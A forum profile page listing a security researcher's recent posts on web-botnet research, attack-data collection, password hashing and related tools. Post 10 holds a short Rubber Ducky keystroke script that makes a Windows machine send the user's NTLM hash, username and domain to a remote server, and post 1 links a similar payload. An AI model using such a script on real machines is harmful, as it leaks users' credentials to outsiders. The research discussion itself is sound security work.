Profile Information

  • Location
    Upstate New York
  • Interests
    I like my adapters in promiscuous mode if you know what I mean ;)

bwall's recent posts
  1. I had posted a payload a while back here on the forums that made the current user attempt to send an NTLMv2 auth to a remote IP (kind of different, but I figured it warranted a mention). The limitation would be that it only affects the current user and requires a remote server to grab the auth (https://github.com/bwall/BAMF/blob/master/IntegrationQueue/static/cifstrap.py).
  2. Snort only does detection on a packet-by-packet basis (correct me if I'm wrong, it's been a while), so I don't believe Snort would work as a total solution, as different attacks can easily span more than one packet. I was thinking of writing an Apache/Nginx module that sent attack data, so at least that would handle vhosts. I'm still working on this though. Currently, I'm trying to find a good way to set up an easy-to-use SDK for various languages so attacks can be reported from plugins/IDSs/etc. I also have a few less public things as well, at least until I can get a good idea of how well they work out.
  3. Yes, as DigiP said, I have filtering methods in place and I confirm information before I merge it into the local database I'm using to conduct the research on. There is also value in gathering information on those who are trying to submit spam/erroneous information. If you are looking for the Attack Scanner link, it's in DigiP's signature, but in case that changes at some point, here it is: http://www.attack-scanner.com/ If you are looking to develop an application/honeypot that will submit information to the API, feel free to contact me about implementation code in the language you are using.
  4. For the past few months (maybe even half a year now), along with DigiP, I have been researching web botnets, the attacks they use, and the common web shells they use. As a result, we have been able to release products to help protect against their spreading attacks and released 2 exploits for taking down the botnets themselves. The issue we have run into is that we have a limited amount of data/honey pots to work with. While we do have some collecting data, the data being gathered is somewhat limited. This is why I started the Attack-Analysis project. This project is designed to host a web API to post general attack information to when your webserver or honey pot receives an attack. This attack data is then pumped into a database, which is later analyzed by me to come up with details on these botnets, including exploits to take them down or, in a slightly less ethical manner, take control of them.
     The details for the API are here: https://defense.ballastsecurity.net/wiki/index.php/Attack_Analysis
     Another place that you can help is with the payload decoder, which archives and decodes RFI payloads. The details for that are here: https://defense.ballastsecurity.net/wiki/index.php/RFI_Payload_Decoder and the results are currently hosted here along with the archived sources: https://defense.ballastsecurity.net/decoding/index.php
     The exploits:
     http://www.exploit-db.com/exploits/24883/
     http://www.exploit-db.com/exploits/20168/
     So if you want to help the good fight, please help out any way you can. I try to make everything I release as open source as possible, but some things need to stay a bit in the dark for security's sake, because I know botters follow my work.
  5. Can't really account for collisions, especially since it depends on what hashing method is employed by the web server. Also, different salts can rule out predictable collisions:
     if hash(pass1 + salt1) == hash(pass2 + salt1):
         hash(pass1 + salt2) != hash(pass2 + salt2)
  6. For everyone who uses a password manager, this might be a good extension for you to try. After doing a bit of research, I found that most hash cracking software cannot crack passwords over 125 characters. While a 125-character password is extremely strong, 126 makes it so hash cracking software must be modified (which can be a pain, as I found after helping patch John the Ripper). I was sad to see that password managers don't have the option to create passwords that large (for the most part), so I decided to create a simple Chrome extension to generate passwords at a variable length, with a focus on massive passwords. Here's a link: https://chrome.google.com/webstore/detail/bwallhatestwits-password/gocfgmeinifgmkhjkdmfjolfmpfpfnbg Feel free to send any questions/comments my way.
  7. Looks like it might be a DPAPI blob, which means that without the master key, the user's password and possible entropy, you can't decrypt it without being logged in as that user. http://msdn.microsoft.com/en-us/library/ms995355.aspx
  8. For a fun way to use the "poor man's VPN" as it was described earlier, sshuttle is a random tool I found that does a fairly good job of setting up a VPN over SSH without requiring root on the remote machine. I don't develop the tool, but it's nice to use.
  9. Maybe it was deleted for bad mouthing Anonymous. I hear some people are afraid of getting DDoS'd by them. Yet they aren't terrorists somehow. ;)
  10. I got a Rubber Ducky for Xmas, and figured I would start with a simple script before I went into encoded binaries. So as far as useful, I figured I would use a testing file I have up on my server which tricks IE into trying to connect to a fake CIFS server, sending a double salted hash of the user's password on the Windows box, along with the username and domain. This information is then dumped to a web-readable file.
      DELAY 1000
      CONTROL ESCAPE
      DELAY 50
      STRING iexplore.exe http://firebwall.com/test.html
      ENTER
      DELAY 2000
      ALT f
      STRING x
      REM http://firebwall.com/hashlog.txt will show the exchange that you can run password cracking on
      I have a custom CIFS server up, but there is a Metasploit module you can run on your own. If you do not wish to make your IP, password hash, username and domain publicly available, do not go to test.html with anything other than wget or curl.
  11. I read the topic to this and was immediately interested. I am a big fan of hunting botters. Some of them make it really easy too. The number one thing you want to do is honey pot and sandbox anything you can get your hands on from the botnet. Get as much intelligence from them as you can, because they always do thoughtless things like hardcode a password into the bots, or connect to a C&C that isn't public. This topic also reminded me of a video I put out through Ballast Security a little while back, about exploiting a pBot RCE to destroy a whole botnet. DigiP did the music for this one I'm pretty sure.
  12. I'm sorry, but flooders are lame, and flooders that don't use PCAP for packet crafting are even worse. Not only is your performance going to drop off a cliff after 65535 "connections" are used, it's going to drop off even more when you hit the file descriptor limit on the OS. 20 lines of Python using pcap and threads could trounce this, but it'll be a cold day in hell when you see me write a DoS tool. This is a prime example of an Anonymous member. So unbelievably ignorant of even the attack methods they use as their primary attack, horrible coding skills, and then thinks he's going to get kudos for posting about DoS tools in a SECURITY thread?
  13. You can use something like http://firebwall.com to stop ARP poisoning attacks. I develop it with some other folks as well. It won't protect you outside of your local network.
  14. Decided to make this into a blog post so I don't have to explain the idea/challenge in a bunch of places. I have an even better version hidden away in my "software lab". https://www.ballastsecurity.net/php/first-of-many-encrypted-php-shell-challenges/